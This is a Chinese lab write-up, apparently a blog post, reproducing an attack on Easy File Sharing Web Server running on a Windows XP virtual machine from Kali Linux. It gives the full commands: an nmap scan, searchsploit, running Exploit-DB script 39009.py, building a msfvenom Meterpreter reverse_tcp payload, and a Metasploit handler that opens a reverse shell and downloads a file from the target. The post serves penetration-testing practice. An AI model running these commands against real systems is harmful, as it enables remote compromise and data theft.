easy file sharing server 漏洞复现

本文档详述了如何在Kali Linux中对运行在XP上的EasyFileSharingWebServer进行渗透测试。首先,通过扫描同一网段的主机和端口,然后使用nmap获取服务版本信息。接着,利用searchsploite找到渗透模块,并运行Python脚本成功调用目标系统的计算器。此外,还展示了如何生成Meterpreter payload,并在Kali中设置监听,最终在XP靶机上执行payload,实现远程连接并下载目标文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

  • 实验步骤


二、实验步骤

1:将解压好的easy file sharing web server 拖进xp中安装

2:在xp中打开easy file sharing

3:打开kali 输入ifconfig 并扫描位于同一网段下的存活的主机和其开放的端口

4:使用命令nmap -sV 192.168.179.131 扫描开放端口服务的版本信息

5:使用命令searchsploit easy file sharing 查找渗透模块

6:运行python脚本

路径:/usr/share/exploitdb/windows/remote/39009.py
命令:python /usr/share/exploitdb/windows/remote/39009.py 192.168.179.131 8080

7打开xp靶机即可看到计算器被调用了。

2:

在kali终端中输入msfvenom -p windows/meterpreter/reverse_tcp lhost =192.168.179.132(kali的ip) lport=5000 -f exe -o /home/kali/payload.exe

将生成的payload.exe 拖到xp虚拟机中

在kali终端中输入msfconsole打开metasploit

使用攻击模块,在kali终端中输入

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.179.132

Set lport 5000

Exploit

在xp中运行生成的payload

Kali连接上xp

这里事先在xp的c盘下新建了一个名为hacker.txt文件

使用命令download c:\\test.txt

以root打开kali 在root中可以看到下载的test.txt文件

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值